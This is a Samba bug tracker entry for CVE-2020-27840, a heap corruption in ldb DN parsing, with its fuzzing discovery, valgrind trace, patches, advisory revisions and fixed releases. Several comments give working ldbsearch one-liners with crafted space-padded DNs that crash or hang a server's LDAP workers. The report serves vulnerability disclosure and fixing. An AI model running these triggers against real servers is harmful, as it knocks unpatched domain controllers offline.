14595 – (CVE-2020-27840) CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs

Bug 14595 (CVE-2020-27840) - CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs

Summary: CVE-2020-27840 [SECURITY] Unauthenticated remote heap corruption via bad DNs

Status:	RESOLVED FIXED

Alias:	CVE-2020-27840

Product:	Samba 4.1 and newer
Classification:	Unclassified
Component:	AD: LDB/DSDB/SAMDB (show other bugs)
Version:	unspecified
Hardware:	All All

Importance:	P5 normal (vote)
Target Milestone:	---
Assignee:	Karolin Seeger
QA Contact:	Samba QA Contact

URL:
Keywords:

Depends on:
Blocks:	14661
	Show dependency tree / graph

Reported:	2020-12-11 03:42 UTC by Douglas Bagnall
Modified:	2021-05-03 00:52 UTC (History)
CC List:	7 users (show)

See Also:

Attachments
proof of concept (2.83 KB, patch) 2020-12-11 03:42 UTC, Douglas Bagnall	no flags	Details
the immediate fix (726 bytes, patch) 2020-12-11 03:42 UTC, Douglas Bagnall	no flags	Details
Advisory v1 (1.81 KB, text/plain) 2021-01-08 01:43 UTC, Douglas Bagnall	no flags	Details
patch with more explanatory text. (3.98 KB, patch) 2021-02-11 02:25 UTC, Douglas Bagnall	no flags	Details
Advisory v2 (2.41 KB, text/plain) 2021-02-11 02:25 UTC, Douglas Bagnall	abartlet: review+	Details
patch for master (9.04 KB, patch) 2021-02-11 22:38 UTC, Douglas Bagnall	abartlet: review+ dbagnall: ci-passed+	Details
patch for 4.14 (9.04 KB, patch) 2021-02-11 22:39 UTC, Douglas Bagnall	abartlet: review+	Details
patch for 4.13 (9.04 KB, patch) 2021-02-11 22:39 UTC, Douglas Bagnall	abartlet: review+	Details
patch for 4.12 (9.04 KB, patch) 2021-02-11 22:40 UTC, Douglas Bagnall	abartlet: review+	Details
patch for 4.11 (9.32 KB, patch) 2021-02-11 22:41 UTC, Douglas Bagnall	abartlet: review+	Details
patch for unsupported Samba 4 versions (3.99 KB, patch) 2021-02-11 22:51 UTC, Douglas Bagnall	no flags	Details
patch for master (v2, with Reviewed-by: abartlet) (9.18 KB, patch) 2021-02-16 22:38 UTC, Douglas Bagnall	abartlet: review+ dbagnall: ci-passed+	Details
patch for 4.14 v2 (9.18 KB, patch) 2021-02-16 22:40 UTC, Douglas Bagnall	abartlet: review+ dbagnall: ci-passed+	Details
patch for 4.13 v2 (9.18 KB, patch) 2021-02-16 22:40 UTC, Douglas Bagnall	abartlet: review+ dbagnall: ci-passed+	Details
patch for 4.12 v2 (9.18 KB, patch) 2021-02-16 22:41 UTC, Douglas Bagnall	abartlet: review+ dbagnall: ci-passed+	Details
patch for 4.11 v2 (9.47 KB, patch) 2021-02-16 22:42 UTC, Douglas Bagnall	abartlet: review+ dbagnall: ci-passed+	Details
Updated Advisory v3 including version numbers (2.43 KB, text/plain) 2021-03-12 08:43 UTC, Karolin Seeger	dbagnall: review- abartlet: review+	Details
Updated advisory v4 (2.43 KB, text/plain) 2021-03-15 08:04 UTC, Karolin Seeger	dbagnall: review+	Details
Show Obsolete (10) View All Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.

Description Douglas Bagnall 2020-12-11 03:42:08 UTC

Created attachment 16365 [details]
proof of concept

A DN string with particular patterns of trailing space can cause ldb_dn_explodes to wander away and put zero bytes in arbitrary places in the heap.

From the proof of concept:

$ valgrind bin/default/lib/ldb/explode_ldb_dn_explode 
==1732366== Memcheck, a memory error detector
==1732366== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==1732366== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
==1732366== Command: bin/default/lib/ldb/explode_ldb_dn_explode
==1732366== 
==1732366== Invalid write of size 1
==1732366==    at 0x48667CE: ldb_dn_explode (ldb_dn.c:722)
==1732366==    by 0x48669DA: ldb_dn_validate (ldb_dn.c:754)
==1732366==    by 0x1091E0: main (explode_ldb_dn_explode.c:12)
==1732366==  Address 0x4c157a7 is 9 bytes before a block of size 211 alloc'd
==1732366==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
==1732366==    by 0x4AD2365: __talloc_with_prefix (talloc.c:783)
==1732366==    by 0x4AD24FF: __talloc (talloc.c:825)
==1732366==    by 0x4AD299C: _talloc_named_const (talloc.c:982)
==1732366==    by 0x4AD6B26: _talloc_array (talloc.c:2763)
==1732366==    by 0x4865B71: ldb_dn_explode (ldb_dn.c:343)
==1732366==    by 0x48669DA: ldb_dn_validate (ldb_dn.c:754)
==1732366==    by 0x1091E0: main (explode_ldb_dn_explode.c:12)
==1732366== 
==1732366== 


This is due to interactions between the way trailing space and leading space are handled.

I have a simple fix for this one, and an ongoing series of patches to stop ldb_dn_explode doing this to us.

Comment 1 Douglas Bagnall 2020-12-11 03:42:44 UTC

Created attachment 16366 [details]
the immediate fix

Comment 2 Douglas Bagnall 2020-12-11 03:46:48 UTC

found with the help of Honggfuzz.

Comment 3 Douglas Bagnall 2020-12-12 22:06:17 UTC

Following the logic of bug #14049, this might not be a security issue, because it can't be remotely triggered.

OTOH, there might be a way to connect these e.g. dots:

1. ldap_decode()

2. case ASN1_APPLICATION() => asn1_read_OctetString_talloc(), we have the verbatim crafted DN string.

2. ldapsrv_BindSimple() calls authenticate_ldap_simple_bind_send() with the dn as name.

3. ...a maze of cracknames...

4. DsCrackNameOneName():

	/* A LDAP DN as a string */
	case DRSUAPI_DS_NAME_FORMAT_FQDN_1779: {
		domain_filter = NULL;
		name_dn = ldb_dn_new(mem_ctx, sam_ctx, name);
		if (! ldb_dn_validate(name_dn)) {

Comment 4 Douglas Bagnall 2020-12-12 22:27:52 UTC

The trouble of course is in constructing the ASN1.

Using the ldb clients of course crashes on the client side:

$ bin/ldbsearch -H ldap://$SERVER -U$USERNAME%$PASSWORD -b "$(printf 'a=b%*s,c= ' 600 ' ')"
corrupted double-linked list
^C

and other ldap tools just don't seem to want to do it.

Comment 5 Douglas Bagnall 2020-12-13 06:04:14 UTC

It's actually quite easy using attributes.

This kills all the ldap workers in my testenv:

for i in {1..20}; do  x=$((i * 20)); echo $x; bin/ldbsearch -H ldap://$SERVER -U$USERNAME%$PASSWORD  "(member=$(printf 'a=b%*s,c= ' $x ' '))" ; done

Comment 6 Douglas Bagnall 2020-12-13 19:44:35 UTC

This in a testenv:

$ for i in {1..200}; do  x=$((i * 99)); echo $x; bin/ldbsearch -H ldaps://$SERVER --simple-bind-dn="$(printf 'a=b%*s,c= ' $x ' ')" --password=sdfsdfsd -kno  ; done

causes "corrupted double-linked list" and/or crashes on the server.

Comment 7 Douglas Bagnall 2020-12-13 20:09:17 UTC

(In reply to Douglas Bagnall from comment #6)

At some offsets, like '106':

$ bin/ldbsearch -H ldaps://$SERVER --simple-bind-dn="$(printf 'a=b%*s,c= ' 106 ' ')" --password=sdfsdfsd -kno


I get "free(): invalid pointer" and the worker hangs on __lll_lock_wait_private (), so the parent does not restart it (as would happen with a segfault or abort).

Even as a DoS, heap corruption is worse.

Comment 8 Andrew Bartlett 2020-12-14 00:01:05 UTC

CVSSv3.1: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H (7.5) for the DoS only, but I agree, this is likely worse (but how much worse is hard to know). 

I've requested a CVE number from Red hat.

Comment 9 Douglas Bagnall 2021-01-08 01:43:07 UTC

Created attachment 16383 [details]
Advisory v1

Comment 10 Douglas Bagnall 2021-02-11 02:23:47 UTC

Confirmed in various Samba versions from 4.1 to 4.13.

Comment 11 Douglas Bagnall 2021-02-11 02:25:10 UTC

Created attachment 16441 [details]
patch with more explanatory text.

Comment 12 Douglas Bagnall 2021-02-11 02:25:48 UTC

Created attachment 16442 [details]
Advisory v2

Comment 13 Douglas Bagnall 2021-02-11 22:38:48 UTC

Created attachment 16444 [details]
patch for master

Comment 14 Douglas Bagnall 2021-02-11 22:39:28 UTC

Created attachment 16445 [details]
patch for 4.14

Comment 15 Douglas Bagnall 2021-02-11 22:39:57 UTC

Created attachment 16446 [details]
patch for 4.13

Comment 16 Douglas Bagnall 2021-02-11 22:40:24 UTC

Created attachment 16447 [details]
patch for 4.12

Comment 17 Douglas Bagnall 2021-02-11 22:41:01 UTC

Created attachment 16448 [details]
patch for 4.11

Comment 18 Douglas Bagnall 2021-02-11 22:51:05 UTC

Created attachment 16449 [details]
patch for unsupported Samba 4 versions

The "patch for unsupported Samba 4 versions" applies to 4.5 and should work on anything from 4.0 to 4.10. It doesn't have the tests. To test on these platforms, use the proof of concept patch or the shell snippets in the comments here (or, better still, UPGRADE).

Patches for master, 4.14, 4.13, 4.12 are all essentially identical.

The patch for 4.11 differs only because the surrounding tests have changed in the meantime.

Comment 19 Andrew Bartlett 2021-02-16 00:37:22 UTC

Even with the clear explanation in the commit message, this makes my head spin.

Comment 20 Douglas Bagnall 2021-02-16 22:38:34 UTC

Created attachment 16460 [details]
patch for master (v2, with Reviewed-by: abartlet)

Comment 21 Douglas Bagnall 2021-02-16 22:40:15 UTC

Created attachment 16461 [details]
patch for 4.14 v2

Comment 22 Douglas Bagnall 2021-02-16 22:40:59 UTC

Created attachment 16462 [details]
patch for 4.13 v2

Comment 23 Douglas Bagnall 2021-02-16 22:41:35 UTC

Created attachment 16463 [details]
patch for 4.12 v2

Comment 24 Douglas Bagnall 2021-02-16 22:42:25 UTC

Created attachment 16464 [details]
patch for 4.11 v2

Comment 25 Andrew Bartlett 2021-02-17 08:04:40 UTC

I think there is just CI and filling in the $VERSIONS to go on this one, and then it will be ready.

Comment 26 Douglas Bagnall 2021-02-17 20:40:48 UTC

Advisory $VERSIONS is still to be determined.

Comment 27 Andrew Bartlett 2021-02-26 19:32:43 UTC

Is this the same as bug 10122 reported in 2013?

Comment 28 Douglas Bagnall 2021-02-28 00:20:39 UTC

(In reply to Andrew Bartlett from comment #27)
> Is this the same as bug 10122 reported in 2013?

I think not. The whitespace in examples there consists mostly or wholy of line breaks, and only one or two of them. This bug only affects real 0x20 space characters.

Comment 29 Karolin Seeger 2021-03-12 08:43:41 UTC

Created attachment 16530 [details]
Updated Advisory v3 including version numbers

Add version numbers, a username -> an username

Comment 30 Douglas Bagnall 2021-03-12 23:45:55 UTC

Comment on attachment 16530 [details]
Updated Advisory v3 including version numbers

Actually "a username" seems more correct to me.

I have a funny dialect, but Google agrees.

Comment 31 Karolin Seeger 2021-03-15 08:04:34 UTC

Created attachment 16547 [details]
Updated advisory v4

an username -> a username

Comment 32 Karolin Seeger 2021-03-15 10:17:34 UTC

Planned release date 2021-03-24.

Comment 33 Samba QA Contact 2021-03-24 08:56:38 UTC

This bug was referenced in samba v4-14-stable (Release samba-4.14.1):

c82bea2b723b55dca626fad9f9478d89c90cfd10
f89767bea7330ec1936d2312e2b1da7b435c04b7
2d82f0e1b84bb390dbf6a3547e4234bfec4eac21

Comment 34 Samba QA Contact 2021-03-24 08:57:37 UTC

This bug was referenced in samba v4-13-stable (Release samba-4.13.6):

7924431e7e4bbe41ca2224d8a560d504d6fb25f3
2193d84004581d68a6e5b5cac76b7c78bdfc4e33
56a72e2562a1e7c690ff2500309fce0371c3576d

Comment 35 Samba QA Contact 2021-03-24 08:59:02 UTC

This bug was referenced in samba v4-12-stable (Release samba-4.12.13):

d59379853d8ea755a0281969f98aeca133201894
4caf1ebc7a09d2743757da31db7e88b0321a3533
4d40e9ce9c7c36d8cd07cc79440811f97428bb80

Comment 36 Samba QA Contact 2021-03-24 10:37:59 UTC

This bug was referenced in samba v4-12-test:

d59379853d8ea755a0281969f98aeca133201894
4caf1ebc7a09d2743757da31db7e88b0321a3533
4d40e9ce9c7c36d8cd07cc79440811f97428bb80

Comment 37 Samba QA Contact 2021-03-24 10:53:19 UTC

This bug was referenced in samba v4-13-test:

7924431e7e4bbe41ca2224d8a560d504d6fb25f3
2193d84004581d68a6e5b5cac76b7c78bdfc4e33
56a72e2562a1e7c690ff2500309fce0371c3576d

Comment 38 Samba QA Contact 2021-03-24 10:56:54 UTC

This bug was referenced in samba v4-14-test:

c82bea2b723b55dca626fad9f9478d89c90cfd10
f89767bea7330ec1936d2312e2b1da7b435c04b7
2d82f0e1b84bb390dbf6a3547e4234bfec4eac21

Comment 39 Stefan Metzmacher 2021-03-24 11:03:49 UTC

Note the following additional releases were made in order to
have standalone ldb releases with the fixes and let Samba depend on
them when using system libraries:

samba-4.12.14 (with ldb-2.1.5)
samba-4.13.7  (with ldb-2.2.1)
samba-4.14.2  (with ldb-2.3.0)

Comment 40 Samba QA Contact 2021-03-24 13:12:03 UTC

This bug was referenced in samba master:

1996b79f376b459bb964a6344ca5f264e7d6e2ec
dbb3e65f7e382adf5fa6a6afb3d8684aca3f201a
9532c44baea130db74f866e1472cb871936cd3dd

Comment 41 Karolin Seeger 2021-03-25 10:02:39 UTC

Samba 4.14.2 (4.14.1), 4.13.7 (4.13.6) and 4.12.14 (4.12.13) have been shipped to address this defect.
Closing out bug report.

Thanks!

Comment 42 Douglas Bagnall 2021-05-01 01:53:38 UTC

Belatedly making this public.

Comment 43 Andrew Bartlett 2021-05-03 00:52:15 UTC

Removing samba-vendor from CC.  Subscribe manually with your own account on the CC if you need to follow along from here.